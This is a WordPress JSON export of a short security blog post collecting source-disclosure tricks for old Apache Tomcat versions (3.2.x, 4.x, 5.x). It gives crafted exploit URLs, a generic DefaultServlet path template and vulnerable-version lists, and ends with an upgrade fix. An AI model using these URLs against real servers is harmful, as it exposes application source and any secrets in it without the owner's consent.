{"id":180,"date":"2011-01-10T22:03:06","date_gmt":"2011-01-10T21:03:06","guid":{"rendered":"https:\/\/thebc.ch\/blog\/?p=180"},"modified":"2013-02-01T13:18:26","modified_gmt":"2013-02-01T12:18:26","slug":"attacking-apache-tomcat-jsp","status":"publish","type":"post","link":"https:\/\/thebc.ch\/blog\/?p=180","title":{"rendered":"Attacking Apache Tomcat JSP"},"content":{"rendered":"<span id=\"Try_to_get_the_source\"><h3>Try to get the source<\/h3><\/span>\n<p>Apache Software Foundation Tomcat 3.2.4<br \/>\nApache Software Foundation Tomcat 3.2.3<\/p>\n<pre><a title=\"http:\/\/example.com:80\/examples\/jsp\/source.jsp\" href=\"http:\/\/example.com\/examples\/jsp\/source.jsp\" rel=\"nofollow\">http:\/\/example.com:80\/examples\/jsp\/source.jsp<\/a>??\r\n<a title=\"http:\/\/example.com:80\/examples\/jsp\/source.jsp?\/jsp\/\" href=\"http:\/\/example.com\/examples\/jsp\/source.jsp?\/jsp\/\" rel=\"nofollow\">http:\/\/example.com:80\/examples\/jsp\/source.jsp?\/jsp\/<\/a><\/pre>\n<p><span style=\"font-size: xx-small;\"><a title=\"http:\/\/www.securityfocus.com\/bid\/4876\/exploit\" href=\"http:\/\/www.securityfocus.com\/bid\/4876\/exploit\" rel=\"nofollow\">http:\/\/www.securityfocus.com\/bid\/4876\/exploit<\/a><\/span><\/p>\n<p>Apache Software Foundation Tomcat 4.X<\/p>\n<p>[SECURITY] Apache Tomcat 4.x JSP source disclosure vulnerability<\/p>\n<p><span><br \/>\n<a id=\"2._Details\" name=\"2._Details\"><\/a><\/span><\/p>\n<span id=\"Details\"><h3>2. 
Details<\/h3><\/span>\n<p>Let's say you have a valid URL like<\/p>\n<pre><a title=\"http:\/\/my.site\/login.jsp\" href=\"http:\/\/my.site\/login.jsp\" rel=\"nofollow\">http:\/\/my.site\/login.jsp<\/a><\/pre>\n<p>then a URL like<\/p>\n<pre><a title=\"http:\/\/my.site\/servlet\/org.apache.catalina.servlets.DefaultServlet\/login.jsp\" href=\"http:\/\/my.site\/servlet\/org.apache.catalina.servlets.DefaultServlet\/login.jsp\" rel=\"nofollow\">http:\/\/my.site\/servlet\/org.apache.catalina.servlets.DefaultServlet\/login.jsp<\/a><\/pre>\n<p>will give you the source code of the JSP page. The full syntax of the exposure URL is:<\/p>\n<pre>http:\/\/{server}[:port]\/[Context\/]org.apache.catalina.servlets.DefaultServlet\/[context_relative_path\/]file_name.jsp<\/pre>\n<p>For example, to see the JSP source of the Tomcat 4.1.10 admin application<\/p>\n<p><a title=\"http:\/\/localhost:8080\/admin\/index.jsp\" href=\"http:\/\/localhost:8080\/admin\/index.jsp\" rel=\"nofollow\">http:\/\/localhost:8080\/admin\/index.jsp<\/a><\/p>\n<p>execute<\/p>\n<p><a title=\"http:\/\/localhost:8080\/admin\/servlet\/org.apache.catalina.servlets.DefaultServlet\/index.jsp\" href=\"http:\/\/localhost:8080\/admin\/servlet\/org.apache.catalina.servlets.DefaultServlet\/index.jsp\" rel=\"nofollow\">http:\/\/localhost:8080\/admin\/servlet\/org.apache.catalina.servlets.DefaultServlet\/index.jsp<\/a><br \/>\n<span style=\"font-size: xx-small;\"><a title=\"http:\/\/marc.theaimsgroup.com\/?l=tomcat-user&amp;m=103417249925541&amp;w=2\" href=\"http:\/\/marc.theaimsgroup.com\/?l=tomcat-user&amp;m=103417249925541&amp;w=2\" rel=\"nofollow\">http:\/\/marc.theaimsgroup.com\/?l=tomcat-user&amp;m=103417249925541&amp;w=2<\/a><\/span><\/p>\n<p>&nbsp;<\/p>\n<hr size=\"2\" \/>\n<p><strong>Vulnerable Systems:<\/strong><br \/>\n* Apache Tomcat version 5.0.28<br \/>\n* Apache Tomcat version 5.5.12<br \/>\n* Apache Tomcat version 5.5.9<br \/>\n* Apache Tomcat version 5.5.7<\/p>\n<p>&nbsp;<\/p>\n<p><strong>Immune Systems:<\/strong><br \/>\n* Apache Tomcat version 5.5.17<\/p>\n<p><strong>Examples:<\/strong><br \/>\nThe following URLs will trigger the vulnerability:<br \/>\n<em><a title=\"http:\/\/www.sitexyz.com\/;index.jsp\" href=\"http:\/\/www.sitexyz.com\/;index.jsp\" rel=\"nofollow\">http:\/\/www.sitexyz.com\/;index.jsp<\/a><br \/>\n<a title=\"http:\/\/www.sitexyz.com\/help\/;help.do\" href=\"http:\/\/www.sitexyz.com\/help\/;help.do\" rel=\"nofollow\">http:\/\/www.sitexyz.com\/help\/;help.do<\/a><\/em><\/p>\n<p><strong>Solution:<\/strong><br \/>\nUpgrade to the latest stable Tomcat release. A confirmed fix is available in Apache Tomcat version 5.5.17.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Try to get the source Apache Software Foundation Tomcat 3.2.4 Apache Software Foundation Tomcat 3.2.3 http:\/\/example.com:80\/examples\/jsp\/source.jsp?? http:\/\/example.com:80\/examples\/jsp\/source.jsp?\/jsp\/ http:\/\/www.securityfocus.com\/bid\/4876\/exploit Apache Software Foundation Tomcat 4.X [SECURITY] Apache Tomcat 4.x JSP source disclosure vulnerability 2. 
Details Let's say you have a valid URL like &hellip; <a href=\"https:\/\/thebc.ch\/blog\/?p=180\">Continue reading <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":3,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[13],"tags":[],"class_list":["post-180","post","type-post","status-publish","format-standard","hentry","category-security"],"_links":{"self":[{"href":"https:\/\/thebc.ch\/blog\/index.php?rest_route=\/wp\/v2\/posts\/180","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/thebc.ch\/blog\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/thebc.ch\/blog\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/thebc.ch\/blog\/index.php?rest_route=\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/thebc.ch\/blog\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=180"}],"version-history":[{"count":13,"href":"https:\/\/thebc.ch\/blog\/index.php?rest_route=\/wp\/v2\/posts\/180\/revisions"}],"predecessor-version":[{"id":2740,"href":"https:\/\/thebc.ch\/blog\/index.php?rest_route=\/wp\/v2\/posts\/180\/revisions\/2740"}],"wp:attachment":[{"href":"https:\/\/thebc.ch\/blog\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=180"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/thebc.ch\/blog\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=180"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/thebc.ch\/blog\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=180"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}